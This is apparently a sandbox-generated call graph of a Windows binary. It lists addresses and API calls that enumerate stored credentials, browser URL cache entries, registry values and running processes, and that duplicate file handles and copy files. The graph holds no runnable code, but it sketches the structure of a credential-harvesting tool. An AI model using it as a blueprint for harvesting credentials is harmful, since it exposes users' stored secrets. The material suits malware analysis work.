38273 40969c LoadCursorW SetCursor 38135->38273 38137 411143 38147 40b633 ??3@YAXPAX 38137->38147 38274 444a54 38137->38274 38277 4032b4 38137->38277 38138 4110f7 _wcsicmp 38138->38141 38139 411157 38140 40ada2 _wcsicmp 38139->38140 38144 411167 38140->38144 38141->38135 38141->38138 38295 410c46 10 API calls 38141->38295 38142 4111af 38144->38142 38145 4111a6 qsort 38144->38145 38145->38142 38147->38139 38149->37945 38151 40eb10 38150->38151 38163 40e8e0 38151->38163 38154 40eb6c memcpy memcpy 38155 40ebb7 38154->38155 38155->38154 38156 40ebf2 ??2@YAPAXI ??2@YAPAXI 38155->38156 38158 40d134 16 API calls 38155->38158 38157 40ec2e ??2@YAPAXI 38156->38157 38160 40ec65 38156->38160 38157->38160 38158->38155 38160->38160 38173 40ea7f 38160->38173 38162 402f49 38162->37945 38164 40e8f2 38163->38164 38165 40e8eb ??3@YAXPAX 38163->38165 38166 40e900 38164->38166 38167 40e8f9 ??3@YAXPAX 38164->38167 38165->38164 38168 40e911 38166->38168 38169 40e90a ??3@YAXPAX 38166->38169 38167->38166 38170 40e931 ??2@YAPAXI ??2@YAPAXI 38168->38170 38171 40e921 ??3@YAXPAX 38168->38171 38172 40e92a ??3@YAXPAX 38168->38172 38169->38168 38170->38154 38171->38172 38172->38170 38174 40aa04 ??3@YAXPAX 38173->38174 38175 40ea88 38174->38175 38176 40aa04 ??3@YAXPAX 38175->38176 38177 40ea90 38176->38177 38178 40aa04 ??3@YAXPAX 38177->38178 38179 40ea98 38178->38179 38180 40aa04 ??3@YAXPAX 38179->38180 38181 40eaa0 38180->38181 38182 40a9ce 4 API calls 38181->38182 38183 40eab3 38182->38183 38184 40a9ce 4 API calls 38183->38184 38185 40eabd 38184->38185 38186 40a9ce 4 API calls 38185->38186 38187 40eac7 38186->38187 38188 40a9ce 4 API calls 38187->38188 38189 40ead1 38188->38189 38189->38162 38190->38121 38191->38125 38249 40b2cc 38192->38249 38194 402b0a 38195 40b2cc 27 API calls 38194->38195 38196 402b23 38195->38196 38197 40b2cc 27 API calls 38196->38197 38198 402b3a 38197->38198 38199 40b2cc 27 API calls 38198->38199 38200 402b54 38199->38200 38201 40b2cc 27 API calls 38200->38201 38202 402b6b 38201->38202 38203 40b2cc 27 API calls 38202->38203 38204 402b82 38203->38204 38205 40b2cc 27 API calls 38204->38205 38206 402b99 38205->38206 38207 40b2cc 27 API calls 38206->38207 38208 402bb0 38207->38208 38209 40b2cc 27 API calls 38208->38209 38210 402bc7 38209->38210 38211 40b2cc 27 API calls 38210->38211 38212 402bde 38211->38212 38213 40b2cc 27 API calls 38212->38213 38214 402bf5 38213->38214 38215 40b2cc 27 API calls 38214->38215 38216 402c0c 38215->38216 38217 40b2cc 27 API calls 38216->38217 38218 402c23 38217->38218 38219 40b2cc 27 API calls 38218->38219 38220 402c3a 38219->38220 38221 40b2cc 27 API calls 38220->38221 38222 402c51 38221->38222 38223 40b2cc 27 API calls 38222->38223 38224 402c68 38223->38224 38225 40b2cc 27 API calls 38224->38225 38226 402c7f 38225->38226 38227 40b2cc 27 API calls 38226->38227 38228 402c99 38227->38228 38229 40b2cc 27 API calls 38228->38229 38230 402cb3 38229->38230 38231 40b2cc 27 API calls 38230->38231 38232 402cd5 38231->38232 38233 40b2cc 27 API calls 38232->38233 38234 402cf0 38233->38234 38235 40b2cc 27 API calls 38234->38235 38236 402d0b 38235->38236 38237 40b2cc 27 API calls 38236->38237 38238 402d26 38237->38238 38239 40b2cc 27 API calls 38238->38239 38240 402d3e 38239->38240 38241 40b2cc 27 API calls 38240->38241 38242 402d59 38241->38242 38243 40b2cc 27 API calls 38242->38243 38244 402d78 38243->38244 38245 40b2cc 27 API calls 38244->38245 38246 402d93 38245->38246 38247 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38246->38247 38247->38129 38248->38119 38252 40b58d 38249->38252 38251 40b2d1 38251->38194 38253 40b5a4 GetModuleHandleW FindResourceW 38252->38253 38254 40b62e 38252->38254 38255 40b5c2 LoadResource 38253->38255 38257 40b5e7 38253->38257 38254->38251 38256 40b5d0 SizeofResource LockResource 38255->38256 38255->38257 38256->38257 38257->38254 38265 40afcf 38257->38265 38259 40b608 memcpy 38268 40b4d3 memcpy 38259->38268 38261 40b61e 38269 40b3c1 18 API calls 38261->38269 38263 40b626 38270 40b04b 38263->38270 38266 40b04b ??3@YAXPAX 38265->38266 38267 40afd7 ??2@YAPAXI 38266->38267 38267->38259 38268->38261 38269->38263 38271 40b051 ??3@YAXPAX 38270->38271 38272 40b05f 38270->38272 38271->38272 38272->38254 38273->38137 38275 444a64 FreeLibrary 38274->38275 38276 444a83 38274->38276 38275->38276 38276->38139 38278 4032c4 38277->38278 38279 40b633 ??3@YAXPAX 38278->38279 38280 403316 38279->38280 38296 44553b 38280->38296 38284 403480 38492 40368c 15 API calls 38284->38492 38286 403489 38287 40b633 ??3@YAXPAX 38286->38287 38289 403495 38287->38289 38288 40333c 38288->38284 38290 4033a9 memset memcpy 38288->38290 38291 4033ec wcscmp 38288->38291 38490 4028e7 11 API calls 38288->38490 38491 40f508 6 API calls 38288->38491 38289->38139 38290->38288 38290->38291 38291->38288 38294 403421 _wcsicmp 38294->38288 38295->38141 38297 445548 38296->38297 38298 445599 38297->38298 38493 40c768 38297->38493 38299 4455a8 memset 38298->38299 38306 4457f2 38298->38306 38576 403988 38299->38576 38310 445854 38306->38310 38678 403e2d memset memset memset memset memset 38306->38678 38307 4455e5 38318 445672 38307->38318 38324 44560f 38307->38324 38308 4458bb memset memset 38311 414c2e 17 API calls 38308->38311 38361 4458aa 38310->38361 38701 403c9c memset memset memset memset memset 38310->38701 38314 4458f9 38311->38314 38313 44595e memset memset 38321 414c2e 17 API calls 38313->38321 38323 40b2cc 27 API calls 38314->38323 38315 44558c 38560 444b06 38315->38560 38316 44557a 38316->38315 38774 41366b FreeLibrary 38316->38774 38587 403fbe memset memset memset memset memset 38318->38587 38319 445a00 memset memset 38724 414c2e 38319->38724 38320 445b22 38326 445bca 38320->38326 38327 445b38 memset memset memset 38320->38327 38322 44599c 38321->38322 38331 40b2cc 27 API calls 38322->38331 38332 445909 38323->38332 38334 4087b3 338 API calls 38324->38334 38325 445849 38789 40b1ab ??3@YAXPAX ??3@YAXPAX 38325->38789 38333 445c8b memset memset 38326->38333 38398 445cf0 38326->38398 38336 445bd4 38327->38336 38337 445b98 38327->38337 38345 4459ac 38331->38345 38342 409d1f 6 API calls 38332->38342 38346 414c2e 17 API calls 38333->38346 38343 445621 38334->38343 38335 44589f 38790 40b1ab ??3@YAXPAX ??3@YAXPAX 38335->38790 38340 414c2e 17 API calls 38336->38340 38337->38336 38348 445ba2 38337->38348 38353 445be2 38340->38353 38341 403335 38489 4452e5 45 API calls 38341->38489 38356 445919 38342->38356 38775 4454bf 20 API calls 38343->38775 38344 445823 38344->38325 38366 4087b3 338 API calls 38344->38366 38357 409d1f 6 API calls 38345->38357 38358 445cc9 38346->38358 38863 4099c6 wcslen 38348->38863 38349 4456b2 38777 40b1ab ??3@YAXPAX ??3@YAXPAX 38349->38777 38351 40b2cc 27 API calls 38362 445a4f 38351->38362 38364 40b2cc 27 API calls 38353->38364 38354 445d3d 38383 40b2cc 27 API calls 38354->38383 38355 445d88 memset memset memset 38367 414c2e 17 API calls 38355->38367 38791 409b98 GetFileAttributesW 38356->38791 38368 4459bc 38357->38368 38369 409d1f 6 API calls 38358->38369 38359 445879 38359->38335 38379 4087b3 338 API calls 38359->38379 38361->38308 38384 44594a 38361->38384 38740 409d1f wcslen wcslen 38362->38740 38373 445bf3 38364->38373 38366->38344 38376 445dde 38367->38376 38859 409b98 GetFileAttributesW 38368->38859 38378 445ce1 38369->38378 38370 445bb3 38866 445403 memset 38370->38866 38371 445680 38371->38349 38610 4087b3 memset 38371->38610 38382 409d1f 6 API calls 38373->38382 38374 445928 38374->38384 38792 40b6ef 38374->38792 38385 40b2cc 27 API calls 38376->38385 38883 409b98 GetFileAttributesW 38378->38883 38379->38359 38381 40b2cc 27 API calls 38390 445a94 38381->38390 38392 445c07 38382->38392 38393 445d54 _wcsicmp 38383->38393 38384->38313 38397 4459ed 38384->38397 38396 445def 38385->38396 38386 4459cb 38386->38397 38406 40b6ef 253 API calls 38386->38406 38745 40ae18 38390->38745 38391 44566d 38391->38306 38661 413d4c 38391->38661 38402 445389 259 API calls 38392->38402 38403 445d71 38393->38403 38466 445d67 38393->38466 38395 445665 38776 40b1ab ??3@YAXPAX ??3@YAXPAX 38395->38776 38404 409d1f 6 API calls 38396->38404 38397->38319 38397->38320 38398->38341 38398->38354 38398->38355 38399 445389 259 API calls 38399->38326 38408 445c17 38402->38408 38884 445093 23 API calls 38403->38884 38411 445e03 38404->38411 38406->38397 38407 4456d8 38413 40b2cc 27 API calls 38407->38413 38414 40b2cc 27 API calls 38408->38414 38410 44563c 38410->38395 38416 4087b3 338 API calls 38410->38416 38885 409b98 GetFileAttributesW 38411->38885 38412 40b6ef 253 API calls 38412->38341 38418 4456e2 38413->38418 38419 445c23 38414->38419 38415 445d83 38415->38341 38416->38410 38778 413fa6 _wcsicmp _wcsicmp 38418->38778 38423 409d1f 6 API calls 38419->38423 38421 445e12 38427 445e6b 38421->38427 38434 40b2cc 27 API calls 38421->38434 38425 445c37 38423->38425 38424 4456eb 38430 4456fd memset memset memset memset 38424->38430 38431 4457ea 38424->38431 38432 445389 259 API calls 38425->38432 38426 445b17 38860 40aebe 38426->38860 38887 445093 23 API calls 38427->38887 38779 409c70 wcscpy wcsrchr 38430->38779 38782 413d29 38431->38782 38437 445c47 38432->38437 38438 445e33 38434->38438 38435 445e7e 38440 445f67 38435->38440 38443 40b2cc 27 API calls 38437->38443 38444 409d1f 6 API calls 38438->38444 38449 40b2cc 27 API calls 38440->38449 38441 445ab2 memset 38445 40b2cc 27 API calls 38441->38445 38447 445c53 38443->38447 38448 445e47 38444->38448 38450 445aa1 38445->38450 38446 409c70 2 API calls 38451 44577e 38446->38451 38452 409d1f 6 API calls 38447->38452 38886 409b98 GetFileAttributesW 38448->38886 38454 445f73 38449->38454 38450->38426 38450->38441 38455 409d1f 6 API calls 38450->38455 38752 40add4 38450->38752 38757 445389 38450->38757 38766 40ae51 38450->38766 38456 409c70 2 API calls 38451->38456 38457 445c67 38452->38457 38459 409d1f 6 API calls 38454->38459 38455->38450 38460 44578d 38456->38460 38461 445389 259 API calls 38457->38461 38458 445e56 38458->38427 38463 445e83 memset 38458->38463 38462 445f87 38459->38462 38460->38431 38468 40b2cc 27 API calls 38460->38468 38461->38326 38890 409b98 GetFileAttributesW 38462->38890 38467 40b2cc 27 API calls 38463->38467 38466->38341 38466->38412 38469 445eab 38467->38469 38470 4457a8 38468->38470 38471 409d1f 6 API calls 38469->38471 38472 409d1f 6 API calls 38470->38472 38473 445ebf 38471->38473 38474 4457b8 38472->38474 38475 40ae18 9 API calls 38473->38475 38781 409b98 GetFileAttributesW 38474->38781 38485 445ef5 38475->38485 38477 4457c7 38477->38431 38479 4087b3 338 API calls 38477->38479 38478 40ae51 9 API calls 38478->38485 38479->38431 38480 445f5c 38482 40aebe FindClose 38480->38482 38481 40add4 2 API calls 38481->38485 38482->38440 38483 40b2cc 27 API calls 38483->38485 38484 409d1f 6 API calls 38484->38485 38485->38478 38485->38480 38485->38481 38485->38483 38485->38484 38487 445f3a 38485->38487 38888 409b98 GetFileAttributesW 38485->38888 38889 445093 23 API calls 38487->38889 38489->38288 38490->38294 38491->38288 38492->38286 38494 40c775 38493->38494 38891 40b1ab ??3@YAXPAX ??3@YAXPAX 38494->38891 38496 40c788 38892 40b1ab ??3@YAXPAX ??3@YAXPAX 38496->38892 38498 40c790 38893 40b1ab ??3@YAXPAX ??3@YAXPAX 38498->38893 38500 40c798 38501 40aa04 ??3@YAXPAX 38500->38501 38502 40c7a0 38501->38502 38894 40c274 memset 38502->38894 38507 40a8ab 9 API calls 38508 40c7c3 38507->38508 38509 40a8ab 9 API calls 38508->38509 38510 40c7d0 38509->38510 38923 40c3c3 38510->38923 38514 40c7e5 38515 40c877 38514->38515 38516 40c86c 38514->38516 38522 40c634 50 API calls 38514->38522 38948 40a706 38514->38948 38523 40bdb0 38515->38523 38965 4053fe 39 API calls 38516->38965 38522->38514 39249 404363 38523->39249 38526 40bf5d 39269 40440c 38526->39269 38528 40bdee 38528->38526 38531 40b2cc 27 API calls 38528->38531 38529 40bddf CredEnumerateW 38529->38528 38532 40be02 wcslen 38531->38532 38532->38526 38535 40be1e 38532->38535 38533 40be26 _wcsncoll 38533->38535 38535->38526 38535->38533 38537 40be7d memset 38535->38537 38538 40bea7 memcpy 38535->38538 38539 40bf11 wcschr 38535->38539 38540 40b2cc 27 API calls 38535->38540 38542 40bf43 LocalFree 38535->38542 39272 40bd5d 28 API calls 38535->39272 39273 404423 38535->39273 38537->38535 38537->38538 38538->38535 38538->38539 38539->38535 38541 40bef6 _wcsnicmp 38540->38541 38541->38535 38541->38539 38542->38535 38543 4135f7 39288 4135e0 38543->39288 38546 40b2cc 27 API calls 38547 41360d 38546->38547 38548 40a804 8 API calls 38547->38548 38549 413613 38548->38549 38550 41361b 38549->38550 38551 41363e 38549->38551 38552 40b273 27 API calls 38550->38552 38553 4135e0 FreeLibrary 38551->38553 38554 413625 GetProcAddress 38552->38554 38555 413643 38553->38555 38554->38551 38556 413648 38554->38556 38555->38316 38557 413658 38556->38557 38558 4135e0 FreeLibrary 38556->38558 38557->38316 38559 413666 38558->38559 38559->38316 39291 4449b9 38560->39291 38577 40399d 38576->38577 39317 403a16 38577->39317 38579 403a09 39331 40b1ab ??3@YAXPAX ??3@YAXPAX 38579->39331 38581 4039a3 38581->38579 38585 4039f4 38581->38585 39328 40a02c CreateFileW 38581->39328 38582 403a12 wcsrchr 38582->38307 38585->38579 38586 4099c6 2 API calls 38585->38586 38586->38579 38588 414c2e 17 API calls 38587->38588 38589 404048 38588->38589 38590 414c2e 17 API calls 38589->38590 38591 404056 38590->38591 38592 409d1f 6 API calls 38591->38592 38593 404073 38592->38593 38594 409d1f 6 API calls 38593->38594 38595 40408e 38594->38595 38596 409d1f 6 API calls 38595->38596 38597 4040a6 38596->38597 38598 403af5 20 API calls 38597->38598 38599 4040ba 38598->38599 38600 403af5 20 API calls 38599->38600 38601 4040cb 38600->38601 39358 40414f memset 38601->39358 38603 404140 39372 40b1ab ??3@YAXPAX ??3@YAXPAX 38603->39372 38604 4040ec memset 38608 4040e0 38604->38608 38606 404148 38606->38371 38607 4099c6 2 API calls 38607->38608 38608->38603 38608->38604 38608->38607 38609 40a8ab 9 API calls 38608->38609 38609->38608 39385 40a6e6 WideCharToMultiByte 38610->39385 38612 4087ed 39386 4095d9 memset 38612->39386 38615 408809 memset memset memset memset memset 38616 40b2cc 27 API calls 38615->38616 38617 4088a1 38616->38617 38618 409d1f 6 API calls 38617->38618 38619 4088b1 38618->38619 38643 408953 38643->38371 38662 40b633 ??3@YAXPAX 38661->38662 38663 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38662->38663 38664 413f00 Process32NextW 38663->38664 38665 413da5 OpenProcess 38664->38665 38666 413f17 CloseHandle 38664->38666 38667 413df3 memset 38665->38667 38670 413eb0 38665->38670 38666->38407 39851 413f27 38667->39851 38669 413ebf ??3@YAXPAX 38669->38670 38670->38664 38670->38669 38671 4099f4 3 API calls 38670->38671 38671->38670 38672 413e37 GetModuleHandleW 38674 413e46 GetProcAddress 38672->38674 38675 413e1f 38672->38675 38674->38675 38675->38672 39856 413959 38675->39856 39872 413ca4 38675->39872 38677 413ea2 CloseHandle 38677->38670 38679 414c2e 17 API calls 38678->38679 38680 403eb7 38679->38680 38681 414c2e 17 API calls 38680->38681 38682 403ec5 38681->38682 38683 409d1f 6 API calls 38682->38683 38684 403ee2 38683->38684 38685 409d1f 6 API calls 38684->38685 38686 403efd 38685->38686 38687 409d1f 6 API calls 38686->38687 38688 403f15 38687->38688 38689 403af5 20 API calls 38688->38689 38690 403f29 38689->38690 38691 403af5 20 API calls 38690->38691 38692 403f3a 38691->38692 38693 40414f 33 API calls 38692->38693 38694 403f4f 38693->38694 38695 403faf 38694->38695 38696 403f5b memset 38694->38696 38699 4099c6 2 API calls 38694->38699 38700 40a8ab 9 API calls 38694->38700 39886 40b1ab ??3@YAXPAX ??3@YAXPAX 38695->39886 38696->38694 38698 403fb7 38698->38344 38699->38694 38700->38694 38702 414c2e 17 API calls 38701->38702 38703 403d26 38702->38703 38704 414c2e 17 API calls 38703->38704 38705 403d34 38704->38705 38706 409d1f 6 API calls 38705->38706 38707 403d51 38706->38707 38708 409d1f 6 API calls 38707->38708 38709 403d6c 38708->38709 38710 409d1f 6 API calls 38709->38710 38711 403d84 38710->38711 38712 403af5 20 API calls 38711->38712 38713 403d98 38712->38713 38714 403af5 20 API calls 38713->38714 38715 403da9 38714->38715 38716 40414f 33 API calls 38715->38716 38721 403dbe 38716->38721 38717 403e1e 39887 40b1ab ??3@YAXPAX ??3@YAXPAX 38717->39887 38719 403dca memset 38719->38721 38720 403e26 38720->38359 38721->38717 38721->38719 38722 4099c6 2 API calls 38721->38722 38723 40a8ab 9 API calls 38721->38723 38722->38721 38723->38721 38725 414b81 9 API calls 38724->38725 38726 414c40 38725->38726 38727 414c73 memset 38726->38727 39888 409cea 38726->39888 38728 414c94 38727->38728 39891 414592 RegOpenKeyExW 38728->39891 38732 414c64 SHGetSpecialFolderPathW 38733 414d0b 38732->38733 38733->38351 38734 414cc1 38735 414cf4 wcscpy 38734->38735 39892 414bb0 wcscpy 38734->39892 38735->38733 38737 414cd2 39893 4145ac RegQueryValueExW 38737->39893 38739 414ce9 RegCloseKey 38739->38735 38741 409d62 38740->38741 38742 409d43 wcscpy 38740->38742 38741->38381 38743 409719 2 API calls 38742->38743 38744 409d51 wcscat 38743->38744 38744->38741 38746 40aebe FindClose 38745->38746 38747 40ae21 38746->38747 38748 4099c6 2 API calls 38747->38748 38749 40ae35 38748->38749 38750 409d1f 6 API calls 38749->38750 38751 40ae49 38750->38751 38751->38450 38753 40ade0 38752->38753 38754 40ae0f 38752->38754 38753->38754 38755 40ade7 wcscmp 38753->38755 38754->38450 38755->38754 38756 40adfe wcscmp 38755->38756 38756->38754 38758 40ae18 9 API calls 38757->38758 38763 4453c4 38758->38763 38759 40ae51 9 API calls 38759->38763 38760 4453f3 38762 40aebe FindClose 38760->38762 38761 40add4 2 API calls 38761->38763 38764 4453fe 38762->38764 38763->38759 38763->38760 38763->38761 38765 445403 254 API calls 38763->38765 38764->38450 38765->38763 38767 40ae7b FindNextFileW 38766->38767 38768 40ae5c FindFirstFileW 38766->38768 38769 40ae94 38767->38769 38770 40ae8f 38767->38770 38768->38769 38772 40aeb6 38769->38772 38773 409d1f 6 API calls 38769->38773 38771 40aebe FindClose 38770->38771 38771->38769 38772->38450 38773->38772 38774->38315 38775->38410 38776->38391 38777->38391 38778->38424 38780 409c89 38779->38780 38780->38446 38781->38477 38783 413d39 38782->38783 38784 413d2f FreeLibrary 38782->38784 38785 40b633 ??3@YAXPAX 38783->38785 38784->38783 38786 413d42 38785->38786 38787 40b633 ??3@YAXPAX 38786->38787 38788 413d4a 38787->38788 38788->38306 38789->38310 38790->38361 38791->38374 38793 44db70 38792->38793 38794 40b6fc memset 38793->38794 38795 409c70 2 API calls 38794->38795 38796 40b732 wcsrchr 38795->38796 38797 40b743 38796->38797 38798 40b746 memset 38796->38798 38797->38798 38799 40b2cc 27 API calls 38798->38799 38800 40b76f 38799->38800 38801 409d1f 6 API calls 38800->38801 38802 40b783 38801->38802 39894 409b98 GetFileAttributesW 38802->39894 38804 40b792 38805 40b7c2 38804->38805 38806 409c70 2 API calls 38804->38806 39895 40bb98 38805->39895 38808 40b7a5 38806->38808 38810 40b2cc 27 API calls 38808->38810 38815 40b7b2 38810->38815 38811 40b837 FindCloseChangeNotification 38814 40b83e memset 38811->38814 38812 40b817 38813 409a45 3 API calls 38812->38813 38816 40b827 CopyFileW 38813->38816 39928 40a6e6 WideCharToMultiByte 38814->39928 38818 409d1f 6 API calls 38815->38818 38816->38814 38818->38805 38819 40b866 38820 444432 121 API calls 38819->38820 38822 40b879 38820->38822 38821 40bad5 38824 40baeb 38821->38824 38825 40bade DeleteFileW 38821->38825 38822->38821 38823 40b273 27 API calls 38822->38823 38826 40b89a 38823->38826 38827 40b04b ??3@YAXPAX 38824->38827 38825->38824 38828 438552 134 API calls 38826->38828 38829 40baf3 38827->38829 38830 40b8a4 38828->38830 38829->38384 38831 40bacd 38830->38831 38833 4251c4 137 API calls 38830->38833 38832 443d90 111 API calls 38831->38832 38832->38821 38856 40b8b8 38833->38856 38834 40bac6 39951 424f26 123 API calls 38834->39951 38835 40b8bd memset 39929 425413 38835->39929 38838 425413 17 API calls 38838->38856 38841 40a71b MultiByteToWideChar 38841->38856 38842 40a734 MultiByteToWideChar 38842->38856 38843 4253af 17 API calls 38843->38856 38844 4253cf 17 API calls 38844->38856 38845 40b9b5 memcmp 38845->38856 38846 4099c6 2 API calls 38846->38856 38847 404423 38 API calls 38847->38856 38850 4251c4 137 API calls 38850->38856 38851 40bb3e memset memcpy 39952 40a734 MultiByteToWideChar 38851->39952 38853 40bb88 LocalFree 38853->38856 38856->38834 38856->38835 38856->38838 38856->38841 38856->38842 38856->38843 38856->38844 38856->38845 38856->38846 38856->38847 38856->38850 38856->38851 38857 40ba5f memcmp 38856->38857 38858 4099f4 3 API calls 38856->38858 39936 4253ef 38856->39936 39941 40b64c 38856->39941 39947 447280 memset 38856->39947 39948 447960 memset memcpy memcpy memcpy 38856->39948 39949 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38856->39949 39950 447920 memcpy memcpy memcpy 38856->39950 38857->38856 38858->38856 38859->38386 38861 40aed1 38860->38861 38862 40aec7 FindClose 38860->38862 38861->38320 38862->38861 38864 4099d7 38863->38864 38865 4099da memcpy 38863->38865 38864->38865 38865->38370 38867 40b2cc 27 API calls 38866->38867 38868 44543f 38867->38868 38869 409d1f 6 API calls 38868->38869 38870 44544f 38869->38870 40037 409b98 GetFileAttributesW 38870->40037 38872 44545e 38873 445476 38872->38873 38875 40b6ef 253 API calls 38872->38875 38874 40b2cc 27 API calls 38873->38874 38876 445482 38874->38876 38875->38873 38877 409d1f 6 API calls 38876->38877 38878 445492 38877->38878 40038 409b98 GetFileAttributesW 38878->40038 38880 4454a1 38881 4454b9 38880->38881 38882 40b6ef 253 API calls 38880->38882 38881->38399 38882->38881 38883->38398 38884->38415 38885->38421 38886->38458 38887->38435 38888->38485 38889->38485 38890->38466 38891->38496 38892->38498 38893->38500 38895 414c2e 17 API calls 38894->38895 38896 40c2ae 38895->38896 38966 40c1d3 38896->38966 38901 40c3be 38918 40a8ab 38901->38918 38902 40afcf 2 API calls 38903 40c2fd FindFirstUrlCacheEntryW 38902->38903 38904 40c3b6 38903->38904 38905 40c31e wcschr 38903->38905 38906 40b04b ??3@YAXPAX 38904->38906 38907 40c331 38905->38907 38908 40c35e FindNextUrlCacheEntryW 38905->38908 38906->38901 38910 40a8ab 9 API calls 38907->38910 38908->38905 38909 40c373 GetLastError 38908->38909 38911 40c3ad FindCloseUrlCache 38909->38911 38912 40c37e 38909->38912 38913 40c33e wcschr 38910->38913 38911->38904 38914 40afcf 2 API calls 38912->38914 38913->38908 38915 40c34f 38913->38915 38917 40c391 FindNextUrlCacheEntryW 38914->38917 38916 40a8ab 9 API calls 38915->38916 38916->38908 38917->38905 38917->38911 39176 40a97a 38918->39176 38921 40a8cc 38921->38507 38922 40a8d0 7 API calls 38922->38921 39181 40b1ab ??3@YAXPAX ??3@YAXPAX 38923->39181 38925 40c3dd 38926 40b2cc 27 API calls 38925->38926 38927 40c3e7 38926->38927 39182 414592 RegOpenKeyExW 38927->39182 38929 40c3f4 38930 40c50e 38929->38930 38931 40c3ff 38929->38931 38945 405337 38930->38945 38932 40a9ce 4 API calls 38931->38932 38933 40c418 memset 38932->38933 39183 40aa1d 38933->39183 38936 40c471 38938 40c47a _wcsupr 38936->38938 38937 40c505 RegCloseKey 38937->38930 38939 40a8d0 7 API calls 38938->38939 38940 40c498 38939->38940 38941 40a8d0 7 API calls 38940->38941 38942 40c4ac memset 38941->38942 38943 40aa1d 38942->38943 38944 40c4e4 RegEnumValueW 38943->38944 38944->38937 38944->38938 39185 405220 38945->39185 38949 4099c6 2 API calls 38948->38949 38950 40a714 _wcslwr 38949->38950 38951 40c634 38950->38951 39242 405361 38951->39242 38954 40c65c wcslen 39245 4053b6 39 API calls 38954->39245 38955 40c71d wcslen 38955->38514 38957 40c677 38958 40c713 38957->38958 39246 40538b 39 API calls 38957->39246 39248 4053df 39 API calls 38958->39248 38961 40c6a5 38961->38958 38962 40c6a9 memset 38961->38962 38963 40c6d3 38962->38963 39247 40c589 44 API calls 38963->39247 38965->38515 38967 40ae18 9 API calls 38966->38967 38969 40c210 38967->38969 38968 40ae51 9 API calls 38968->38969 38969->38968 38970 40c264 38969->38970 38972 40add4 2 API calls 38969->38972 38974 40c231 _wcsicmp 38969->38974 38975 40c1d3 35 API calls 38969->38975 38971 40aebe FindClose 38970->38971 38973 40c26f 38971->38973 38972->38969 38978 40e5ed memset memset 38973->38978 38974->38969 38976 40c248 38974->38976 38975->38969 38991 40c084 22 API calls 38976->38991 38979 414c2e 17 API calls 38978->38979 38980 40e63f 38979->38980 38981 409d1f 6 API calls 38980->38981 38982 40e658 38981->38982 38992 409b98 GetFileAttributesW 38982->38992 38984 40e667 38985 40e680 38984->38985 38986 409d1f 6 API calls 38984->38986 38993 409b98 GetFileAttributesW 38985->38993 38986->38985 38988 40e68f 38989 40c2d8 38988->38989 38994 40e4b2 38988->38994 38989->38901 38989->38902 38991->38969 38992->38984 38993->38988 39015 40e01e 38994->39015 38996 40e593 38997 40e5b0 38996->38997 38998 40e59c DeleteFileW 38996->38998 38999 40b04b ??3@YAXPAX 38997->38999 38998->38997 39001 40e5bb 38999->39001 39000 40e521 39000->38996 39038 40e175 39000->39038 39003 40e5c4 CloseHandle 39001->39003 39004 40e5cc 39001->39004 39003->39004 39006 40b633 ??3@YAXPAX 39004->39006 39005 40e573 39007 40e584 39005->39007 39008 40e57c FindCloseChangeNotification 39005->39008 39009 40e5db 39006->39009 39081 40b1ab ??3@YAXPAX ??3@YAXPAX 39007->39081 39008->39007 39011 40b633 ??3@YAXPAX 39009->39011 39012 40e5e3 39011->39012 39012->38989 39014 40e540 39014->39005 39058 40e2ab 39014->39058 39082 406214 39015->39082 39018 40e16b 39018->39000 39021 40afcf 2 API calls 39022 40e08d OpenProcess 39021->39022 39023 40e0a4 GetCurrentProcess DuplicateHandle 39022->39023 39027 40e152 39022->39027 39024 40e0d0 GetFileSize 39023->39024 39025 40e14a CloseHandle 39023->39025 39119 409a45 GetTempPathW 39024->39119 39025->39027 39026 40e160 39030 40b04b ??3@YAXPAX 39026->39030 39027->39026 39029 406214 22 API calls 39027->39029 39029->39026 39030->39018 39031 40e0ea 39122 4096dc CreateFileW 39031->39122 39033 40e0f1 CreateFileMappingW 39034 40e140 CloseHandle CloseHandle 39033->39034 39035 40e10b MapViewOfFile 39033->39035 39034->39025 39036 40e13b FindCloseChangeNotification 39035->39036 39037 40e11f WriteFile UnmapViewOfFile 39035->39037 39036->39034 39037->39036 39039 40e18c 39038->39039 39123 406b90 39039->39123 39042 40e1a7 memset 39049 40e1e8 39042->39049 39043 40e299 39155 4069a3 39043->39155 39048 40dd50 _wcsicmp 39048->39049 39049->39048 39050 40e283 39049->39050 39056 40e244 _snwprintf 39049->39056 39133 406e8f 39049->39133 39162 40742e 8 API calls 39049->39162 39163 40aae3 wcslen wcslen _memicmp 39049->39163 39164 406b53 SetFilePointerEx ReadFile 39049->39164 39051 40e291 39050->39051 39052 40e288 ??3@YAXPAX 39050->39052 39053 40aa04 ??3@YAXPAX 39051->39053 39052->39051 39053->39043 39057 40a8d0 7 API calls 39056->39057 39057->39049 39059 40e2c2 39058->39059 39060 406b90 11 API calls 39059->39060 39061 40e2d3 39060->39061 39062 40e4a0 39061->39062 39064 406e8f 13 API calls 39061->39064 39067 40dd50 _wcsicmp 39061->39067 39068 40e489 39061->39068 39076 40e3e0 memcpy 39061->39076 39077 40e3fb memcpy 39061->39077 39078 40e3b3 wcschr 39061->39078 39079 40e416 memcpy 39061->39079 39080 40e431 memcpy 39061->39080 39165 40dd50 _wcsicmp 39061->39165 39174 40742e 8 API calls 39061->39174 39175 406b53 SetFilePointerEx ReadFile 39061->39175 39063 4069a3 2 API calls 39062->39063 39065 40e4ab 39063->39065 39064->39061 39065->39014 39067->39061 39069 40aa04 ??3@YAXPAX 39068->39069 39070 40e491 39069->39070 39070->39062 39071 40e497 ??3@YAXPAX 39070->39071 39071->39062 39073 40e376 memset 39166 40aa29 39073->39166 39076->39061 39077->39061 39078->39061 39079->39061 39080->39061 39081->38996 39083 406294 CloseHandle 39082->39083 39084 406224 39083->39084 39085 4096c3 CreateFileW 39084->39085 39086 40622d 39085->39086 39087 406281 GetLastError 39086->39087 39088 40a2ef ReadFile 39086->39088 39089 40625a 39087->39089 39090 406244 39088->39090 39089->39018 39093 40dd85 memset 39089->39093 39090->39087 39091 40624b 39090->39091 39091->39089 39092 406777 19 API calls 39091->39092 39092->39089 39094 409bca GetModuleFileNameW 39093->39094 39095 40ddbe CreateFileW 39094->39095 39098 40ddf1 39095->39098 39096 40afcf ??2@YAPAXI ??3@YAXPAX 39096->39098 39097 41352f 9 API calls 39097->39098 39098->39096 39098->39097 39099 40de0b NtQuerySystemInformation 39098->39099 39100 40de3b FindCloseChangeNotification GetCurrentProcessId 39098->39100 39099->39098 39101 40de54 39100->39101 39102 413d4c 46 API calls 